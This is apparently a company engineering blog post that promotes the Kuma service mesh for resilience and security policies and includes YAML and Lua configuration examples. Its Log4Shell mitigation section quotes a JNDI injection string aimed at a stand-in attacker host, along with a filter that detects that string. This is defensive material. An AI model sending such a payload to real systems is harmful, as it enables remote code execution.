Engineering
April 12, 2023
7 min read

Stop Wasting Your Engineers’ Time and Start Improving Your System Stability with Kuma

Marcin Skalski

At first glance, that does not make sense, right? The title suggests you should invest your DevOps/Platform team’s time in introducing a new product that most likely will:

  • increase the complexity of your platform
  • increase resource usage
  • increase the cost of your platform
In this article, we’ll show you that even though those initial concerns are justified, the overall benefits of adopting a service mesh can outweigh the initial effort and investment.

Life without service mesh

Let’s assume we’re working with microservices (or at least migrating to them), and we don't use a service mesh yet.

When working with microservices, you want freedom — freedom of language, tools, or freedom to make architectural choices. (More on this here).

In most cases, this leads to having at least two primary programming languages and a couple of frameworks powering your services. Because a lot of your functionality is now split across services, most of your communication occurs over the network via HTTP/gRPC or asynchronously via message brokers like Kafka.

To say the least, network communication is hard. And if you’re still getting started in this area, this fantastic article on the 8 fallacies of distributed computing is required reading!

When considering reliability, we have methods to deal with those problems using mechanisms like timeouts, retries, circuit breakers, and so on. Likewise, for security, we can increase our “zero trust” posture by utilizing mTLS (which is hard to do right — we’ll talk more about this in the next section). So if there are existing ways of handling some of these issues, then what's the problem? We just need to start using them, and we’re good to go, right? Right?

Unfortunately, as with most things, it’s not that easy!

Let’s look at mTLS configuration in Go for starters. It’s not just setting a few flags and providing certs (even though there are some great tutorials on how to do that). You’re now on the hook to manage certs on your own, in addition to taking care of cert rotation and revocation. You need to transparently reload certs if you want zero downtime. You also need to set a safe minimum TLS version (`MinVersion` in Go's `crypto/tls`).

This is just the beginning, and even after setting this up, you have to think about stability (timeouts, retries, circuit breakers). Imagine how much time it could take for a single service, and then multiply it by the number of services in your infrastructure.

This can easily take hundreds (or even thousands!) of hours, during which you could instead be delivering business value to your customers in the form of a better user experience or additional functionality.

You can solve this issue partially with standardization and service templates. But then you lose your freedom. And when something changes (e.g., you change defaults or add a new mechanism), you need a full-blown migration for it to take effect. Large-scale migrations are nicely described in this talk. Long story short: migrations take a long time, and are often not successful.

Kuma to the rescue!

By now, we can all agree that running microservices or any large distributed system is hard. But there’s a way to get rid of those problems — or at least some of them. And as you probably already guessed, service mesh is that solution!

Service mesh originated from the idea that network communication could be simplified and easily secured, and that the network layer provides a common place to abstract key functionality out of service code and libraries into a shared layer. Kuma is a perfect example of how those hard problems can be simplified and made more understandable for users.

For those who don't know, a service mesh works by injecting lightweight data plane proxies alongside your services. Each data plane proxy gives you:

  • mTLS
  • Service discovery
  • Resiliency
    • Timeouts
    • Retries
    • Circuit breaking
    • Rate limiting
  • Observability
    • Metrics
    • Access logging
    • Tracing
Those mechanisms can all be dynamically configured from the control plane. (More on how service mesh works can be found here.)

Now just imagine how much time engineers in your organization would have to spend introducing and properly configuring those capabilities in each service individually. With a mesh, because configuration is delivered to the data plane proxies over the network and applied automatically, these features can be introduced without any restarts, redeploys, or downtime.
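For instance, a mesh-wide timeout policy might look something like the sketch below (field names follow Kuma's MeshTimeout schema for your version; the policy name and timeout values are illustrative):

```yaml
type: MeshTimeout
name: default-timeouts
mesh: default
spec:
  targetRef:
    kind: Mesh                # apply to every service in the mesh
  to:
    - targetRef:
        kind: Mesh
      default:
        connectionTimeout: 5s # TCP connection establishment
        http:
          requestTimeout: 15s # end-to-end HTTP request timeout
```

Applying it is a single `kumactl apply -f` of this file; the control plane pushes the change to every data plane proxy while your services keep running.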

You may ask, “Why use Kuma if there are other service mesh products out there?”

We believe that Kuma, at the moment, is one of the simplest service meshes around, combining an intuitive UX with a very powerful and configurable set of policies and functionality. This is doubly true since the introduction of our new targetRef-based policies, which make it really simple to configure something like retries for your service, as shown below:
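A sketch of such a policy, in Kuma's Universal resource format (`web` and `backend` are illustrative service names; check the MeshRetry schema for your Kuma version for exact fields):

```yaml
type: MeshRetry
name: web-to-backend-retry
mesh: default
spec:
  targetRef:
    kind: MeshService
    name: web              # requests originating from the web service...
  to:
    - targetRef:
        kind: MeshService
        name: backend      # ...destined for the backend service
      default:
        http:
          numRetries: 3    # retry up to three times
          retryOn:
            - "5XX"        # retry on any 5xx HTTP response
```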

Here we have a basic policy that configures a retry on every 5xx HTTP error from the web service to the backend service. And that's it. You don't need to add another library to your service, implement or test anything, or go through a full release cycle to start retrying errors. All it takes is 10 minutes or less to write and apply a YAML config!

Nullifying the Log4Shell CVE with service mesh

There is one example we find particularly interesting: you can mitigate a whole class of CVEs (Common Vulnerabilities and Exposures) globally without a single restart of your services.

Let’s take a look at the famous Log4Shell vulnerability, where, because of a Log4j vulnerability, attackers could download their executables to your machine simply by getting it to log the string: ${jndi:ldap://attacker.com:1234/a}.

This string could, for example, be sent in an HTTP request to your service; if you logged the incoming traffic, the malicious code would run. The obvious solution would be to upgrade Log4j, but updating and then deploying new versions everywhere takes time and can be problematic if you don't release on a daily basis. And even if you deploy daily, this is something your engineers would have to implement and roll out in every service, which can be stressful and error-prone when done in a rush.

There are two ways we could approach this problem with a service mesh. First, we could add inbound traffic filtering. We can do this by creating a really simple Lua filter that will drop any incoming traffic containing suspicious content in the path, headers, or body (see: How to add a Lua filter).
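As a sketch (not a production-grade rule set), an Envoy Lua filter along these lines could reject requests carrying the JNDI lookup string in a header:

```yaml
name: envoy.filters.http.lua
typed_config:
  "@type": type.googleapis.com/envoy.extensions.filters.http.lua.v3.Lua
  inline_code: |
    function envoy_on_request(request_handle)
      -- Reject any request with a header containing a JNDI lookup string.
      for key, value in pairs(request_handle:headers()) do
        if string.find(string.lower(value), "${jndi:", 1, true) then
          request_handle:respond({[":status"] = "403"}, "blocked")
          return
        end
      end
    end
```

A real filter would also need to handle the path and body, plus the obfuscated variants of the payload, but the point stands: one config change at the proxy layer covers every service at once.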

The second strategy is to block all traffic leaving the mesh except to trusted destinations. In Kuma, we can do this easily with ZoneEgress and External Services: we disable passthrough mode so the mesh blocks all unknown outbound traffic, then configure trusted destinations as External Services. Again, we can do all of this without any development or deployments.
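Sketched in Kuma's Universal resource format (the httpbin destination is just an example of a trusted external service), that combination looks like:

```yaml
# Disable passthrough: outbound traffic to unknown destinations is blocked.
type: Mesh
name: default
networking:
  outbound:
    passthrough: false
---
# Explicitly allow one trusted external destination.
type: ExternalService
mesh: default
name: httpbin
tags:
  kuma.io/service: httpbin
  kuma.io/protocol: http
networking:
  address: httpbin.org:80
```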

What if I don't do microservices?

Since the term “microservices” first appeared in 2011 at an architects' workshop near beautiful Venice, the world has changed. But the changes weren't as spectacular as some may think.

According to an O'Reilly survey from 2020, around 30% of respondents had been running microservices for at least three years. Microservices adoption is growing, but many organizations are still far from adopting the approach. That's why Kuma has extensive support for classic deployments in the form of Universal mode.

You can easily deploy Kuma in your environment, whether you’re running Kubernetes, VMs, or bare metal. This also makes it easy to migrate to microservices in the future if needed, or to modernize your infrastructure by adding k8s clusters alongside your classic infrastructure.

Wrapping up

In summary, implementing complex networking features and developing good standards to improve your product's stability can be very challenging. It can take a lot of time to implement and deploy different solutions, and even then, full-scale migrations take time and money. All the while, engineers in your organization are tied up in these efforts and unable to create value for your customers.

Kuma can help you mitigate a good portion of these problems and improve the overall stability of your product faster and at lower cost. This article is the introduction to a series in which we’ll go deeper into all the resiliency mechanisms that Kuma offers.